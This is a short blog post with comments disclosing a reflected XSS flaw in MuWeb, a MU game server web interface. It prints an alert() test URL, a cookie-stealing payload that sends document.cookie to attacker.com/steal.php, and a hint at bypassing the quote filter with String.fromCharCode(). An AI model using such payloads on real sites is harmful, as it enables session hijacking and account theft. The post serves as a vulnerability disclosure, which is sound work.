XSS MuWeb
Filed under: (in)secure - code, research - custom | Tags: cookie, mmorpg, mu, muweb, online, stealing, xss |
Very often when got nothing to do, I put my thoughts on how to better secure a website/server (it depends). And by accident last week I came upon a XSS vulnerability across a MU server on which I am a co-administrator…
What version of Mutoolz? Don’t know but if you’re eager to find out browse the web, or simply ask google… Ok it’s not Mutoolz based, it’s called MuWeb; some custom developed Mu Web Interface by a guy who doesn’t give a damn about security…..
Anyway this MuWeb, which has the most sickly written code [it takes you a good period of time to modify it] could be exploited in the following way:
—
http://muwebsite.com/index.php?op=<script>alert(/xss/)</script>
—
Yes, it doesn’t use good filters, just some type of filter based on regular expressions… as I used to say: if you ain’t good at regex, DON’T use them
… anyway it filters out double-simple quotes; and what? It’s still vulnerable to XSS, but it won’t work the classical cookie stealing method:
—
http://muwebsite.com/index.php?op=<script>document.location=
‘http://attacker.com/steal.php?C=’+document.cookie</script>
—
But we can bypass this filter, can’t we? by using the String.fromCharCode()…
My question is… How can someone develop components for a Mu Server if it’s making a vulnerable one at the top layer (web app layer)? Who does test this components? Why don’t they test them accurately ?
P.S. Funny thing, after I discovered this XSS vulnerability, I thought I’d find others two with Acunetix… guess what Acunetix didn’t even find the XSS vulnerability :-?
P.P.S No it’s not the regular MuWeb, it’s one combined with Php-Nuke -> http://softshare.uv.ro/
Hey, its a free project, what you want from that?
I admire free projects… or should I call them open source… anyway there should be some guidelines in it… the more secure it is the better apreciated it will be… I wasn’t attacking it I just didn’t appreciate that they relied on php-nuke’s security implementation…
[...] The best information on the topic can be found at the source here [...]
First, Open Source and Free is not the same thing.
Free doesn’t mean it’s Open Source and Open Source doesn’t necessarily mean that it’s free, just that the Source is available (it could be available for a price). So don’t confuse the two terms.
Second, just because it’s free, doesn’t mean it shouldn’t be criticized. Just because someone released it for free, doesn’t mean it has to be crappy. Now, if it is crappy, we have the right to criticize it. It’s called “freedom of speech”. So stick your “it’s free” excuse where the sun doesn’t shine and join all the other pathetic losers that put the “it’s free so don’t complain” on their forhead as a pathetic excuse for the inability to code something that is even moderately securified and working.
@ENC: i don’t get your attitude… earlier versions of MuWeb where open source, at least the one I used to have… when I wrote the article the current version was 0.8 which wasn’t conclusive if it was free/open source… some sub versions (and patches) had the license, while others didn’t